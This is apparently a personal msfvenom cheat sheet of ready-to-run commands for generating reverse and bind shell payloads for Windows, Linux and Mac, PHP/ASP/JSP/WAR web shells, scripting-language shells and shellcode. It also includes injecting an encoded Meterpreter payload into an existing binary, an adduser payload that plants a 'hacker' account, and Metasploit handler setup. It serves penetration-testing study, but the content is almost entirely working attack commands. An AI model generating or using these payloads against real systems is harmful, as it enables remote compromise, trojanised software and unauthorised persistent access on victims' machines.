msfvenon

# List of patloads, formats and platforms
msfvenon --list payloads
msfvenon --list formats
msfvenon --list platform

# Non-Staged
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe

# Staged – Must use meterpreter – netcat won’t work
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe

# Inject payload into a binary
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe  

# Generate non-staged ASP Shell
msfvenon -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=9098 -f asp -o shell.asp 

A non-staged shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler, but also with netcat.

Staged shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it, and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.

Cheat Sheet

List payloads

msfvenom -l

Binaries Payloads

Linux Meterpreter Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf  

Linux Bind Meterpreter Shell

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf  

Linux Bind Shell

msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf  

Windows Meterpreter Reverse TCP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe  

Windows Reverse TCP Shell

msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe  

Windows Encoded Meterpreter Windows Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe  

Mac Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho  

Mac Bind Shell

msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho  

Web Payloads

PHP Meterpreter Reverse TCP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP Meterpreter Reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp  

JSP Java Meterpreter Reverse TCP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp  

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war   

Scripting Payloads

Python Reverse Shell

msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py  

Bash Unix Reverse Shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh  

Perl Unix Reverse shell

msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl  

Shellcode

Windows Meterpreter Reverse TCP Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>  

Linux Meterpreter Reverse TCP Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>  

Mac Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>   

Create User

msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe

Metasploit Handler

use exploit/multi/handler
set PAYLOAD <Payload name>
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
Run